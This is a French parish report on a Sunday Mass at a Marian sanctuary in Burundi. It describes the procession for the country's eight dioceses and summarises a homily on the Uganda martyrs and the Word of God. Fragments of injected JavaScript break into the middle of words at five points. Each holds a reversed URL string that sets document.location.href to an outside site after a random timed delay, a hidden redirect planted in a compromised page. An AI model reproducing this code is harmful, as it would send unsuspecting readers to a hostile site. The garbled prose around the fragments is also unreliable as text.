Père célébrant: Herménégilde COYITUNGIYE (Recteur du Sanctuaire Marial)
Chorales : Saint Nicholas de Flue et Sainte Famille
Lectures : 1) Deuxième livre des Macchabé 7, 9 – 14
2) Romains 8, 31 – 39
3) Evangile selon Matthieu 5, 1-12
Le Treizième Dimanche du Temps Ordinaire a été célébré au Sanctuaire Marial de la Reine de la Paix et la Réconciliation de façon spéciale pour différentes raisons : la solennité des 22 martyrs de l’Uganda, la clôture du mois dédié à la Bible, qui a été couronné par des enseignements bibliques très riches, et la clôture de l’année jubilaire du Renouveau Charismatique Catholique.
La messe a commencé avec une très longue procession avec huit stations symbolisant les huit diocèses de l’Eglise du Burundi. Il faut aussi mentionner que dans la procession, à part le Livre de la Parole de Dieu et l’image de la Vierge Marie, il y avait aussi quarante lecteurs de la Parole de Dieu tenant en mains leurs Bibles ouvertes. A chaque station, on annonçait la Parole et les fidèles la reprenaient trois fois. Puis on prononçait une prière pour chacun des diocèses, son Evêque et ses fidèles.
Dans son homélie, le Père Herménégilde COYITUNGIYE a déclaré que c’est Dieu Lui-même qui veut nous enseigner en passant par sa Sainte Parole, mais aussi en passant par ceux qui l’ont reçue avant nous, comme Charles Luanga et ses compagnons. C’est cette Parole qu’on reçoit et qui change nos cœurs en les rendant toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doux. Les martyrs de l’Uganda, qui ont témoigné pour Jésus, avaient reçu des enseignements de la Parole de Dieu. Dans la première lecture nous avions entendu sept frères avec leur mère qui ont refusé de trahir la coutume de leurs ancêtres; cette parole que Dieu a imprimée dans nos cœurs. Et Luanga de dire «Mieux vaut mourir que de trahir notre foi chrétienne». Le roi Mwanga voulait les forcer à abantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner leur foi, en les menaçant de mort par son pouvoir. Mais on voit Charles Luanga qui, vaillamment, dit à son tortionnaire : «Tu me brules. Mais ça sent comme de l’eau que tu verses sur moi pour me laver». Evidemment c’est une purification pour la rentrée imminente dans le Royaume des cieux.
En plus, pour être fort dans l’amour du Christ, il faut aimer sa Parole. Le dialogue franc entre jeunes garçons et jeunes filles, tout comme celui entre adultes est un plus grand signe d’amour qu’on peut toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner puisque c’est bien là l’expression de cet amour. Si alors tu orientes ton amour vers Jésus et sa Parole, il faut savoir qu’Il t’a aimé le premier dans son cœur transpercé. Saint Paul nous dit que rien ne peut nous détacher de l’amour du Christ. Ensuite, nous sommes invités à avoir un cœur reconnaissant. Nous devons nous joindre au Renouveau Charismatique qui est en train de célébrer son jubilé d’argent. Ainsi, reconnaissons cet amour que Jésus nous montre en nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnant son Esprit. Qu’est-ce qu’il n’a pas fait pour nous? Nous sommes avec Marie qui proclame : «Mon cœur exulte dans le Seigneur…». Le Père Herménégilde a alors posé une question de savoir si tout un chacun ressentait le ciel dans son cœur. Il a ajouté : « comment pourrons-nous vivre dans le ciel, si on n’a pas laissé le ciel habiter en nous ? C’est Jésus qui nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne un modèle à suivre, «Voilà ta Mère». Nous sommes invités de contempler la Vierge Marie comme Elizabeth l’a fait : «Heureuse celle qui a cru à l’accomplissement des paroles qui lui furent dites de la part du Seigneur !» Nous aussi sommes heureux, puisque nous avons su le vrai bonheur. Avec Marie, nous allons être heureux, et toute créature pliera les genoux devant notre Dieu, pour que toute la gloire soit rendue au Père, au Fils et au Saint Esprit, Amen. La messe s’est clôturée par une procession vers le Sanctuaire de la Paix et de la Réconciliation, où la bénédiction solennelle a été toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnée.
Fulgence Ndayizeye